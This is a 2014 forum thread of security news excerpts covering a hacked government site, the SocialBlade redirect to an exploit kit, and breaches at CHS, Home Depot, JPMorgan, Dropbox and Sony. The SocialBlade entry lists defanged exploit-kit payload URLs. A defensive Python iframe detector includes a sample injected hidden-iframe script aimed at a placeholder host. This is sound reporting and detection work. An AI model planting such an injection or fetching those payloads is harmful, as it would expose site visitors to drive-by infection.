July 24, 2014 - "An online security repository of bad links [1] has recently flagged the official website of the Department of Agriculture* (Kagawaran ng Pagsasaka), which is owned and maintained by the Philippine government, as harbouring malware.
* http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/07/DA.png
We have determined that six pages, including the default page, have been injected with a Blackhat SEO spam code. Below is a list of other infected pages:
“Contact Us” page
“Advisory Banner” page
“About Us” page
Department Mission/Vision page
History of DA page
Below is a screenshot of the code we found:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/07/SEO-spam-code.png
... visiting the above infected pages will not get you infected; however, you will be contributing to the increase of the page rank of the gambling-related URL we can see in the code. We have reason to believe that the DA site has been hacked because of the presence of the injected code. Readers are advised to avoid accessing the website entirely until the administrators are able to remove the code and make sure that it’s safe to visit. Malwarebytes has already reported the infection to the DA."
[1] https://www.virustotal.com/en-gb/url/17b18480bc1c1fbb154c43c36cba78c73f5e8c2cfd762eff214964055cbe4090/analysis/1406113101/


2014-07-29, 21:29

SocialBlade .com compromised - redirection chain to Nuclear Pack exploit kit
- http://blog.malwarebytes.org/exploits-2/2014/07/socialblade-com-compromised-starts-redirection-chain-to-nuclear-pack-exploit-kit/
July 29, 2014 - "... the YouTube stats tracker site SocialBlade .com is connected with malicious redirections that also lead to the Nuclear Pack EK.
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/07/socialblade2.png
The drive-by download which was detected by our honeypots is successfully blocked by Malwarebytes Anti-Exploit. According to site tracker SimilarWeb, SocialBlade .com has a global rank of 5,791 and had around 3.6 million visits last month... Typically we’d see an iframe and we would be able to search for it by its string. This was not the case here, so we had to manually inspect each web session and external references. The intruder was in a core JavaScript file... the JavaScript code writes the iframe and launches the redirection workflow... Java exploit (CVE-2013-2465?):
hxxp ://50d88d1ad05y.correctzoom .uni.me/1406197380.jar
VT (4/52*)
* https://www.virustotal.com/en/file/f0641b46121c7fa32e58904b4cc6a0b2c220253a61cf23a0aa26f26d045279e5/analysis/1406296526/
Internet Explorer exploit (CVE ?):
hxxp ://50d88d1ad05y.correctzoom .uni.me/1406197380.htm
VT (0/53**)
** https://www.virustotal.com/en/file/7f6906b5d52b4133b97e3ccb192ea0d46c3ef79b024bfd3ccaff9f0eed2ae651/analysis/
hxxp ://50d88d1ad05y.correctzoom .uni.me/f/1406197380/7
VT (17/52***)
*** https://www.virustotal.com/en/file/da3857d5496c3982222c330bd3d711bbe21d325da094050772b29838edf01e20/analysis/1406311279/
... most likely leads to ad-fraud related malware (clickjacking etc.). We have notified the owners of SocialBlade .com so they can fix the issue ASAP and prevent unnecessary malware infections..."

uni .me: https://www.virustotal.com/en-gb/ip-address/

- https://www.google.com/safebrowsing/diagnostic?site=AS:16276
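The SocialBlade and AskMen write-ups above describe an injection that could not be found by searching the site's JavaScript for an iframe string, because a core JS file assembled and wrote the iframe at runtime. The following is an added example of detection logic for that case, written here in Python and not taken from Malwarebytes, Websense or SocialBlade; it undoes two cheap obfuscations (hex escapes and split string literals) before matching, and the two sample scripts and the host name in them are constructed placeholders.

```python
"""Heuristic scan for injected, dynamically written iframes in JavaScript.
Added example (not code from Malwarebytes, Websense or SocialBlade).
It first undoes two cheap obfuscations, \\xNN escapes and 'a' + 'b' string
splitting, so that an '<iframe' that never appears literally in the file
still shows up for the rule matching that follows."""
import re
from dataclasses import dataclass


@dataclass
class Finding:
    line: int      # line number in the normalised text (joins can merge lines)
    rule: str
    snippet: str


_ESC_X = re.compile(r"\\x([0-9a-fA-F]{2})")
_ESC_U = re.compile(r"\\u([0-9a-fA-F]{4})")
# 'abc' + 'def'  ->  'abcdef'  (quote style of the first literal is kept)
_JOIN = re.compile(r"""(['"])((?:(?!\1).)*)\1\s*\+\s*(['"])((?:(?!\3).)*)\3""")


def normalize(js: str) -> str:
    """Decode hex/unicode escapes and glue adjacent string literals together.
    This is a regex heuristic, not a JavaScript parser."""
    js = _ESC_X.sub(lambda m: chr(int(m.group(1), 16)), js)
    js = _ESC_U.sub(lambda m: chr(int(m.group(1), 16)), js)
    prev = None
    while prev != js:                      # repeat until no 'x' + 'y' is left
        prev = js
        js = _JOIN.sub(lambda m: m.group(1) + m.group(2) + m.group(4) + m.group(1), js)
    return js


RULES = {
    "iframe-markup": re.compile(r"<iframe\b", re.I),
    "createElement-iframe": re.compile(r"createElement\s*\(\s*['\"]iframe['\"]", re.I),
    "document-write": re.compile(r"document\.write(?:ln)?\s*\(", re.I),
    # 0x0 / 1x1 frames and CSS hiding are typical of drive-by redirect frames
    "hidden-frame": re.compile(
        r"(?:width|height)\s*=\s*['\"]?\s*[01]\b|visibility\s*:\s*hidden|display\s*:\s*none",
        re.I),
}


def scan(js: str) -> list[Finding]:
    """Return every rule hit, line by line, on the normalised source."""
    findings = []
    for lineno, line in enumerate(normalize(js).splitlines(), 1):
        for rule, rx in RULES.items():
            if rx.search(line):
                findings.append(Finding(lineno, rule, line.strip()[:80]))
    return findings


def is_suspicious(js: str) -> bool:
    """A frame is built AND it is written into the page or made invisible."""
    hit = {f.rule for f in scan(js)}
    builds_frame = bool(hit & {"iframe-markup", "createElement-iframe"})
    return builds_frame and bool(hit & {"document-write", "hidden-frame"})


def plain_search_would_miss(js: str) -> bool:
    """True when grepping the raw file for '<iframe' fails but normalising reveals one."""
    return "<iframe" not in js.lower() and "<iframe" in normalize(js).lower()


# Constructed samples (not taken from any real site); the host is a placeholder.
BENIGN_JS = """\
// constructed: ordinary site code
var el = document.createElement('div');
el.innerHTML = 'Subscribe to the stats newsletter';
document.body.appendChild(el);
"""

INJECTED_JS = r"""// constructed: mimics an injection into a core JS file
var u = 'http://exploit-host.invalid/' + Date.now() + '.htm';
document.write('<ifr' + 'ame src="' + u + '" width="1" hei' + 'ght="1" style="\x76isibility:hidden"></iframe>');
"""

if __name__ == "__main__":
    for name, src in (("benign", BENIGN_JS), ("injected", INJECTED_JS)):
        print(name, "suspicious" if is_suspicious(src) else "clean")
        for f in scan(src):
            print(f"  line {f.line}: {f.rule}: {f.snippet}")
```

Run it over the site's own JS files (for example every file a page references as an external script) rather than the HTML, since that is where the SocialBlade injection sat.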


2014-08-20, 15:38

Breach at Community Health Systems - data on 4.5M stolen in cyber attack
- http://www.reuters.com/article/2014/08/18/us-community-health-cybersecurity-idUSKBN0GI16N20140818
Aug 18, 2014 - "U.S. hospital operator Community Health Systems Inc said on Monday personal data, including patient names and addresses, of about 4.5 million people were stolen by hackers from its computer network, likely in April and June. The company said the data, considered protected under the Health Insurance Portability and Accountability Act, included patient names, addresses, birth dates, telephone numbers and Social Security numbers. It did not include patient credit card or medical information, Community Health Systems said in a regulatory filing. It said the security breach had affected about 4.5 million people who were referred for or received services from doctors affiliated with the hospital group in the last five years. The FBI warned healthcare providers in April that their cybersecurity systems were lax compared to other sectors, making them vulnerable to hackers looking for details that could be used to access bank accounts or obtain prescriptions... The company said it and its security contractor, FireEye Inc unit Mandiant, believed the attackers originated from China. They did not provide further information about why they believed this was the case. They said they used -malware- and other technology to copy and transfer this data and information from its system..."

- https://www.trustedsec.com/august-2014/chs-hacked-heartbleed-exclusive-trustedsec/
Aug 19, 2014 - "... a breach at Community Health Systems (CHS) affecting an estimated 4.5 million patients was recently revealed. TrustedSec obtained the first details on how the breach occurred and new information relating to this breach. The initial attack vector was through the infamous OpenSSL “heartbleed” vulnerability which led to the compromise of the information... This is the first confirmed breach of its kind where the heartbleed bug is the known initial attack vector that was used..."

- http://www.reuters.com/article/2014/08/20/us-community-health-cybersecurity-idUSKBN0GK0H420140820
Aug 20, 2014 - "... Heartbleed is a major bug in OpenSSL encryption software that is widely used to secure websites and technology products including mobile phones, data center software and telecommunications equipment. It makes systems vulnerable to data theft by hackers who can attack them without leaving a trace..."


2014-09-02, 20:28

Credit Card breach at Home Depot ...
- http://krebsonsecurity.com/2014/09/banks-credit-card-breach-at-home-depot/
Sep 2, 2014 - "Multiple banks say they are seeing evidence that Home Depot stores may be the source of a massive new batch of stolen credit and debit cards that went on sale this morning in the cybercrime underground. Home Depot says that it is working with banks and law enforcement agencies to investigate reports of suspicious activity. Contacted by this reporter about information shared from several financial institutions, Home Depot spokesperson Paula Drake confirmed that the company is investigating. “I can confirm we are looking into some unusual activity and we are working with our banking partners and law enforcement to investigate,” Drake said... There are signs that the perpetrators of this apparent breach may be the same group of Russian and Ukrainian hackers responsible for the data breaches at Target, Sally Beauty and P.F. Chang’s, among others. The banks contacted by this reporter all purchased their customers’ cards from the same underground store – rescator[dot]cc — which on Sept. 2 moved two massive new batches of stolen cards onto the market:
A massive new batch of cards labeled “American Sanctions” and “European Sanctions” went on sale Tuesday, Sept. 2, 2014
> http://krebsonsecurity.com/wp-content/uploads/2014/09/americansanctions.png
... this crime shop has named its newest batch of cards “American Sanctions.” Stolen cards issued by European banks that were used in compromised US store locations are being sold under a new batch of cards labeled “European Sanctions.” It is not clear at this time how many stores may be impacted, but preliminary analysis indicates the breach may extend across all 2,200 Home Depot stores in the United States. Home Depot also operates some 287 stores outside the U.S. including in Canada, Guam, Mexico, and Puerto Rico. This is likely to be a fast-moving story with several updates as more information becomes available. Stay tuned.
Update: 1:50 p.m. ET: Several banks contacted by this reporter said they believe this breach may extend back to late April or early May 2014. If that is accurate — and if even a majority of Home Depot stores were compromised — this breach could be many times larger than Target, which had 40 million credit and debit cards stolen over a three-week period."

- http://www.bloomberg.com/news/print/2014-09-02/home-depot-shares-drop-after-retailer-investigates-data-breach.html
Sep 2, 2014

- https://atlas.arbor.net/briefs/index#908540839
High Severity
11 Sep 2014

Home Depot hit by same Malware as Target
- http://krebsonsecurity.com/2014/09/home-depot-hit-by-same-malware-as-target/
Sep 7, 2014 - "... new -variant- of the same malicious software program that stole card account data from cash registers at Target last December..."
> http://blog.trendmicro.com/trendlabs-security-intelligence/new-blackpos-malware-emerges-in-the-wild-targets-retail-accounts/

- http://www.reuters.com/article/2014/09/08/us-usa-home-depot-databreach-idUSKBN0H327E20140908
Sep 8, 2014 - "... Home Depot Inc confirmed on Monday that its payment security systems have been breached, which could impact customers using payment cards at its stores in the United States and Canada. Home Depot, however, said it has found no evidence that personal identification numbers (PINs) have been compromised, it said in a statement*..."
* http://phx.corporate-ir.net/phoenix.zhtml?c=63646&p=RssLanding&cat=news&id=1964976
Sep 8, 2014

- http://blog.trendmicro.com/trendlabs-security-intelligence/home-depot-breach-linked-to-blackpos-malware/
Sep 9, 2014


2014-09-11, 01:05

5 million GMail accounts hacked
- http://money.cnn.com/2014/09/10/technology/security/gmail-hack/
Sep 10, 2014

- http://www.webroot.com/blog/2014/09/10/5-million-gmail-accounts-breached-one/
Sep 10, 2014 - "... This morning, we found out that there was a breach of over 5 million Gmail accounts, all hosted in a plain text file on Russian hacker forums. Naturally, we wanted to see what the data was like, and there it was, plain as day for everyone to see. We started to look up our various accounts, and out of my whole team, I was the only one to appear. Right in front of me, on a list with 5 million other people, was my information.... Every three months is the average for a company for changing passwords, often not allowing you to repeat for at least 10 passwords. This may be an annoyance, but with breaches like this occurring on a daily basis, it’s a necessary step that you should be following at home as well. It’s no longer simply about someone figuring your password out, but rather the idea that any level of breach can grab your standard password and e-mail address, and attempt it across multiple channels until success is found. Changing your password removes this ability... With cell phones being at the ready in almost all aspects of our daily lives, this is one of the most convenient and easy layers to implement. By adding this layer, the service will authenticate any login attempt through an independent channel, allowing you to know if someone is attempting unauthorized access. Below are links to the sites listed above for their steps on enabling this step.
Gmail: https://www.google.com/landing/2step/
Amazon: http://aws.amazon.com/iam/details/mfa/
PayPal: https://www.paypal.com/us/cgi-bin?cmd=xpt/Marketing_CommandDriven/securitycenter/PayPalSecurityKey-outside&bn_r=o
Facebook: https://www.facebook.com/note.php?note_id=10150172618258920
Twitter: https://blog.twitter.com/2013/getting-started-with-login-verification
While we are still unsure how the hacker was able to get all this information, it’s clear as day that it is out there, and because of that, vigilance is key. Just as you wouldn’t leave your credit cards lying around, you shouldn’t risk your passwords being out there either. Data is valuable, and the more private or financially focused it is, the more we need to take it seriously. So take these simple steps, get another layer of security established, and make it a habit to change passwords so you don’t become another name on the list as I did. In the meantime, you can check and see if your e-mail is a part of the breach by following this link:
- https://isleaked.com/en.php

Google Two-Step authentication: https://support.google.com/a/answer/175197?hl=en

- http://www.theinquirer.net/inquirer/news/2364644/google-dismisses-all-but-two-percent-of-gmail-password-dump
Sep 11 2014 - "... Google talked about "credential dumps"*, which is described as the uploading of a lot of usernames and passwords on the web. It called them a 'recent phenomenon', adding that it regularly scans them for evidence of impact. It said that a recent leak from earlier this week, which was thought to include data from around five million Google and other provider email accounts, had a failure rate of around 98 percent, meaning that fewer than two out of every hundred credentials could be used... The firm took the opportunity to remind people that they probably use the same login credentials on a range of websites and that this is like bathing in gasoline while smoking a pipe..."
* http://googleonlinesecurity.blogspot.com.es/2014/09/cleaning-up-after-password-dumps.html


2014-09-19, 13:26

Home Depot breach - 56 million cards ...
- http://www.reuters.com/article/2014/09/18/us-home-depot-dataprotection-idUSKBN0HD2J420140918
Sep 18, 2014 - "Home Depot Inc Thursday said some 56 million payment cards were likely compromised in a cyberattack at its stores, suggesting the hacking attack at the home improvement chain was larger than last year's unprecedented breach at Target Corp. Home Depot, in providing the first clues to how much the breach would cost, said that so far it has estimated costs of $62 million. But it indicated that costs could reach much higher. It will take -months- to determine the full scope of the fraud, which affected Home Depot stores in both the United States and Canada and ran from April to September. Retailer Target incurred costs of $148 million in its second fiscal quarter related to its breach. Target hackers stole at least 40 million payment card numbers and 70 million other pieces of customer data. Home Depot said that criminals used unique, custom-built software that had not been seen in previous attacks and was designed to evade detection in its most complete account of what had happened since it first disclosed the breach on Sept. 8. The company said that the hackers’ method of entry has been closed off, the malware eliminated from its network, and that it had rolled out "enhanced encryption of payment data" to all U.S. stores... Of the estimated cost so far of $62 million, which covers such items as credit monitoring, increased call center staffing, and legal and professional services, Home Depot said it believes that $27 million of the amount will be paid for by insurers. But the company said it has not yet estimated the impact of "probable losses" related to the possible need to reimburse banks for fraud and card replacement, as well as covering costs of lawsuits and government investigations... Criminals have frequently used software that evades detection, but retailers are expected to closely monitor their networks using tools that are designed to uncover signs of a crime in progress..."

- http://www.reuters.com/article/2014/11/07/us-home-depot-dataprotection-idUSKBN0IQ2L120141107
Nov 6, 2014 - "... Criminals used a third-party vendor's user name and password to enter the perimeter of its network, Home Depot said in a statement on Thursday. The hackers then acquired "elevated rights" that allowed them to navigate parts of Home Depot's network and to deploy unique, custom-built malware on its self-checkout systems in the U.S. and Canada, according to the company. Home Depot said the stolen credentials did not alone provide direct access to the company's point-of-sale devices. Since September, the company has implemented enhanced encryption of payment data in all U.S. stores and said the rollout to Canadian stores will be completed by early 2015. This, however, was "really lipstick on a pig" and the proper solution was to add chip and PIN, or EMV technology, to U.S. credit cards, said David Campbell, chief security officer at SendGrid, a cloud-based email delivery service. Home Depot said it was already rolling out the EMV technology*..."
* https://en.wikipedia.org/wiki/EMV


2014-10-03, 13:20

JPMorgan hack exposed data of 83 million ...
- http://www.reuters.com/article/2014/10/02/jpmorgan-cybersecurity-idUSL3N0RX3K620141002
Oct 2, 2014 - "Names, addresses, phone numbers and email addresses of the holders of some 83 million households and small business accounts were exposed when computer systems at JPMorgan Chase & Co were recently compromised by hackers, making it one of the biggest data breaches in history. The bank revealed the scope of the previously disclosed breach on Thursday, saying that there was no evidence that account numbers, passwords, user IDs, birth dates or Social Security numbers had been stolen. It added that it has not seen "unusual customer fraud" related to the attack which exposed contact information for 76 million households and 7 million small businesses. The people affected are mostly account holders, but may also include former account holders and others who entered their contact information at the bank’s online and mobile sites, according to a bank spokeswoman. Security experts outside of the bank warned that the breach could result in an increase in crime as scammers will likely attempt to use the stolen information to engage in various types of fraud. The bank's customers should be on heightened alert for fraud, said Mark Rasch, a former federal cyber crimes prosecutor... At the end of August, JPMorgan said it was working with U.S. law enforcement authorities to investigate a possible cyber attack. As with home break-ins, it can take victims of data attacks months to discover what, if anything, is missing..."

States probe JPMorgan Chase as hack seen fueling fraud
- http://www.reuters.com/article/2014/10/03/us-jpmorgan-cybersecurity-idUSKCN0HS1ST20141003
Oct 3, 2014 - "Two U.S. states are investigating the theft of 83 million customer records from JPMorgan Chase in a massive cyber attack uncovered over the summer, and more may soon join... Illinois Attorney General Lisa Madigan said she has launched a probe into the hack on the No. 1 U.S. bank by assets. Connecticut is also investigating, said a person familiar with the matter who was not authorized to publicly discuss the probe... Special Assistant Attorney General William Brauch, director of the Iowa Department of Justice’s Consumer Protection Division, told Reuters that other states' attorneys general are discussing the matter and could launch a joint investigation... News of the actions by the states emerged a day after the bank said in a regulatory filing that customer names, addresses, phone numbers and email addresses were taken in the attack that the bank said surfaced in August. It added that it was continuing to investigate the matter and that customers would -not- be liable for any unauthorized transactions that were promptly reported to the bank... cybercrime experts warned that the hack could fuel years of fraud, as criminals use the stolen data to "phish" for customer passwords and ferret out other consumer accounts..."

- http://atlas.arbor.net/briefs/index#364889606
Elevated Severity
9 Oct 2014


2014-10-14, 12:48

Dropbox passwords leaked
- http://www.reuters.com/article/2014/10/14/us-cybercrime-dropbox-idUSKCN0I309Z20141014
Oct 14, 2014 - "Hundreds of alleged usernames and passwords for online document-sharing site Dropbox were published on Monday on Pastebin, an anonymous information-sharing website. The anonymous user, who claims to have hacked close to 7 million accounts, is calling for Bitcoin donations to fund the operation... Dropbox, however, said it has -not- been hacked. "These usernames and passwords were unfortunately -stolen- from other services and used in attempts to log in to Dropbox accounts. We'd previously detected these attacks and the vast majority of the passwords posted have been expired for some time now. All other remaining passwords have been expired as well," a Dropbox spokesman said in an email to Reuters. Dropbox is a Silicon Valley startup that has proved a hit with consumers and boasts more than 200 million users six years after it was started..."

- http://www.theinquirer.net/inquirer/news/2375519/dropbox-denies-it-was-hacked-as-7-million-passwords-leak-online
Oct 14 2014 - "... The company said* that, if any leak has occurred, it came from a third-party app and if anyone does happen to be using the same password across services, it is still likely to be very out of date as the company now uses a token API rather than a text-in-the-clear system. At present, the hackers are drip-feeding the user names and passwords they claim to have harvested into Pastebin documents and are appealing for bitcoin donations to reveal more..."

* https://blog.dropbox.com/2014/10/dropbox-wasnt-hacked/
Oct 13, 2014 - "Recent news articles claiming that Dropbox was hacked aren’t true. Your stuff is safe. The usernames and passwords referenced in these articles were stolen from unrelated services, not Dropbox. Attackers then used these stolen credentials to try to log in to sites across the internet, including Dropbox. We have measures in place to detect suspicious login activity and we automatically reset passwords when it happens. Attacks like these are one of the reasons why we strongly encourage users not to reuse passwords across services. For an added layer of security, we always recommend enabling 2 step verification on your account.
Update: 10/14/2014 12:30am PT
A subsequent list of usernames and passwords has been posted online. We’ve checked and these are not associated with Dropbox accounts."


2014-12-02, 05:07

FBI warns of 'destructive' malware in wake of Sony attack
- http://www.reuters.com/article/2014/12/02/us-sony-cybersecurity-malware-idUSKCN0JF3FE20141202
Dec 1, 2014 - "The Federal Bureau of Investigation warned U.S. businesses that hackers have used malicious software to launch a destructive cyberattack in the United States, following a devastating breach last week at Sony Pictures Entertainment. Cybersecurity experts said the malicious software described in the alert appeared to describe the one that affected Sony, which would mark the first major destructive cyber attack waged against a company on U.S. soil. Such attacks have been launched in Asia and the Middle East, but none have been reported in the United States. The FBI report did not say how many companies had been victims of destructive attacks... The five-page, confidential "flash" FBI warning issued to businesses late on Monday provided some technical details about the malicious software used in the attack. It provided advice on how to respond to the malware and asked businesses to contact the FBI if they identified similar malware. The report said the malware overrides all data on hard drives of computers, including the master boot record, which prevents them from booting up... The FBI released the document in the wake of last Monday's unprecedented attack on Sony Pictures Entertainment, which brought corporate email down for a week and crippled other systems as the company prepares to release several highly anticipated films... The FBI said it is investigating the attack with help from the Department of Homeland Security. Sony has hired FireEye's Mandiant incident response team to help clean up after the attack, a move that experts say indicates the severity of the breach. While the FBI report did not name the victim of the destructive attack in its bulletin, two cybersecurity experts who reviewed the document said it was clearly referring to the breach at the California-based unit of Sony Corp...
Hackers used malware similar to that described in the FBI report to launch attacks on businesses in highly destructive attacks in South Korea and the Middle East, including one against oil producer Saudi Aramco that knocked out some 30,000 computers. Those attacks are widely believed to have been launched by hackers working on behalf of the governments of North Korea and Iran. Security experts said that repairing the computers requires technicians to manually either replace the hard drives on each computer, or re-image them, a time-consuming and expensive process..."

- http://www.latimes.com/entertainment/envelope/cotown/la-et-ct-sony-hack-20141201-story.html
Dec 1, 2014

:fear::fear: :mad: